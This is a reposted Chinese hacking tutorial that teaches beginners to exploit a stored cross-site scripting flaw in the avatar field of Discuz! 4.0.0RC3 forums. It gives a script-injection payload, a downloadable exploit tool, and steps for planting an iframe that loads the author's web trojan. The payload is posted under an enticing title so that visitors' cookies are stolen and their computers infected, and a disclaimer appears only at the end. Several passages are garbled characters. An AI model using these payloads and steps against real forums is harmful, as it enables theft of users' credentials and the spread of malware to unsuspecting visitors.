黑客入侵實例記對discuz論壇的入侵

《黑客入侵實例記對discuz論壇的入侵》由會員上傳分享，免費在線閱讀，更多相關內容在學術論文-天天文庫。

1、黑客入侵實例記對Discuz論壇的入侵～教育資源庫　　最近閑來無事的菜鳥們，掀起了一場Discuz論壇，入侵狂潮的運動。一時間鬧整個安全界也是沸騰不已。不過各站點的站長們身手還算敏捷，低版本Discuz論壇還沒用多久，便換上了高版本的論壇（Discuz!4dot0.0RC3版本）進行彌補漏洞。但是經過筆者測試成功，得出高級版本的Discuz程序，也是含有跨站入侵的漏洞。只是在方法有些差別而已。下文便是筆者這段時間入侵研究的心得，何不一同來領略一下入侵帶來的快感！　　一、望穿秋水的手動入侵法　　1.

2、首先進入GOOGLE或者百度的搜索站點，在關鍵字處輸入Poages/avatars/02.gif＞＜script＞alert(曲靖提醒：貴站含有頭像跨站漏洞，請采取相關的防御措施!)＜/script＞的代碼字符。在單擊文件菜單，選擇保存選項，即可將修改的控件，成功保存。然后在雙擊打開該頁面，選擇頭像一的單選框，并單擊下方提交按鈕。程序回顯會提示：修改成功！同時刷新此頁面，彈出筆者所建立的警告對話框（如圖3），最后在找個熱門的帖子回復一下，只要當用戶打開含有筆者的帖子時，都會彈出如圖3的警告對話框！

3、　　　　圖3　　小提示：在控制面板首頁標簽處，查看一下網頁代碼。只要大家稍有留意，便不難發(fā)現(xiàn)調用＜imgsrc=.gu**y../images/avatars/02.gifgsrc=$avatars字符,所以我們可以構造一個Radio的控件值，來修改的選定值。需要用到DreamWeaver網頁設計軟件，或其他的網頁制作軟件來修改，才能自動轉義其格式。而不要使用記事本的形式修改相關數值，否則會導致整體內容錯亂?！　《⒐び破涫卤叵壤淦鳌　∫苍S繁瑣的手工入侵法，不太適合菜鳥使用。不過沒有關系，筆者

4、又為眾菜鳥們量身定做了，一套傻瓜式入侵套餐。此套餐的宗旨就是讓有無基礎的菜鳥朋友，都可以按著下文介紹的方法，來入侵高級版本的Discuz論壇。　　前提條件：首先下載Discuz!4.0.0RC3漏洞利用工具（下載up/DiscuzExploit.exe），這里下載速度較慢的朋友，不要發(fā)愁。該軟件已收錄到本期配套光盤中，還請讀者朋友注意查收一下！　　步驟1.雙擊下載到桌面的漏洞利用工具圖標，彈出程序界面（如圖4），然后在第二步的文本內容處，敲入手動跨站成功的地址（.gu**y../）。操作完畢后，單

5、擊下方讀取參數按鈕，這時需稍等片刻后，才會出現(xiàn)讀取成功的對話框（如圖5），并單擊確定按鈕即可?！　　　D4　　12下一頁友情提醒：，特別！　　圖5　　小提示：本文手動入侵和工具入侵，都是采用同一個站點做列題講解。所以在工具入侵中，有關軟件界面提示，第一步需注冊站點用戶，這里已經在手動入侵中注冊完畢，并且已經保存了COOKIES登陸，因此筆者為了避免重復講解，跳躍了過去。如果您在漏洞站點中，還沒有注冊過用戶的朋友，請先去注冊用戶，然后在執(zhí)行步驟1中的方法?！　〔襟E2.在第三步跨站內容處輸入所要插入的

6、惡意代碼，如果此時你對代碼知識一無所知，可以參考左邊代碼助手，標簽中的三個按鈕（如圖6）。這里筆者單擊插入IFrame按鈕，會在所需的跨站內容處，出現(xiàn)＜iframesrc=''e＞的字符代碼。然后在＜iframesrc的等于后面，填入.fa***d.fda.asp的，這是筆者事先制作好的網頁后門地址?！　　　D6　　小提示：代碼助手中，彈出對話框按鈕、讀取COOKIES按鈕以及插入IFrame按鈕，分別代表當用戶瀏覽過含有自己帖子的同時，1.會彈出如圖3的警告對話框。2.得到瀏覽用

7、戶的COOKIES信息。3.在機器中加載網站木馬的相關信息。　　步驟3.輸入完畢后，其他設置保持默認，然后單擊提交按鈕。執(zhí)行進度框內，會呈現(xiàn)出寫入站點代碼的整個過程（如圖7）。但是成功與否還需要看見后面的成功提示，方可判斷本次寫入是否成功，這里筆者等待十秒鐘后，彈出了成功的結論（如圖8）。既然惡意地址寫入成功，在漏洞論壇取個誘惑力，較強的標題名稱發(fā)表，從而讓瀏覽過此帖的用戶，都能重上筆者所建立的網頁木馬。　　　　圖7　　　　圖8　　三、總結　　Discuz!4dot0.0RC3版本的頭像跨站漏洞，

8、雖然不會危機到整個論壇的安全性能，但是它會牽扯到論壇所用戶的電腦安危。小則導致重要信息被竊取，大則電腦搖身變肉雞！　　注意：本文所介紹的內容，只是告訴大家這種技術，任何人不得利用此技術做非法的事情。上一頁12友情提醒：，特別！